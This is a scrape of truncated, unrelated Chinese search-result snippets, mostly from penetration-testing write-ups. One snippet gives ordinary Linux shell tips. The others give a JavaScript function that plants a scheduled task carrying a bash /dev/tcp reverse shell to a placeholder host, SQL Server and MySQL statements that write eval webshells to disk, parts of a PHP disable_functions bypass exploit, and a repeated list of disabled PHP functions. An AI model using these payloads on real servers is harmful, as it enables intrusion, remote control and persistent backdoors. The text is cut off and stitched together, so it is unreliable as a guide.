find $dir -type f -size 0 -exec rm -rf {} \; 27、查找 Linux 系统中的僵尸进程 #!/bin/bash # 查找 Linux 系统中的僵尸进程 # awk 判断 ps 命令输出的第 8 列为 Z 是,显示该进程的 PID 和进程命令 ps aux | awk '{if($8 == "Z"){print $2,$11}}' 28、生成随机密码 urandom 版本...
禁用函数 passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,...
远程调用的js代码如下: functionaddTask(TaskName, execTime, ip, port) {varexecShell = 'bash -i >& /dev/tcp/your_ip/your_port 0>&1'; execShell=encodeURIComponent(execShell);varparams = 'name=' + TaskName + '&type=minute-n&where1=' + execTime + '&hour=&minute=&week=&sType=to...
sqlserver导出: exec sp_makewebtask ‘C:\test1.php‘,‘ select ‘‘<%eval request("pass")%>‘‘‘-- 1. mysql命令导出getshell: 方法1 Create TABLE xiaoma (xiaoma1 text NOT NULL); Insert INTO xiaoma (xiaoma1) VALUES(‘<?php eval($_POST[xiaoma]);?>‘); select xiaoma1 from xiaoma in...
}elseif($p_type==1&&$p_flags==5) {# PT_LOAD, PF_Read_exec$text_size=$p_memsz; } }if(!$data_addr|| !$text_size|| !$data_size)returnfalse;return[$data_addr,$text_size,$data_size]; }functionget_basic_funcs($base,$elf){list($data_addr,$text_size,$data_size) =$elf;for...
function addTask(TaskName, execTime, ip, port) { var execShell = 'bash -i >& /dev/tcp/your_ip/your_port 0>&1'; execShell = encodeURIComponent(execShell); var params = 'name=' + TaskName + '&type=minute-n&where1=' + execTime + '&hour=&minute=&week=&sType=toShell&sBody...
通过种种突破终于拿到了webshell,也更加方便的进行shell操作,但是上面提到,因为有disable_function的原因,导致一些函数无法调用从而导致命令无法执行: 通过phpinfo也能证明上面的猜想: 这里我直接使用gc bypass disable_function,这里给出示例代码: <?php $command = $_GET['cmd']; ...
禁用函数 passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,...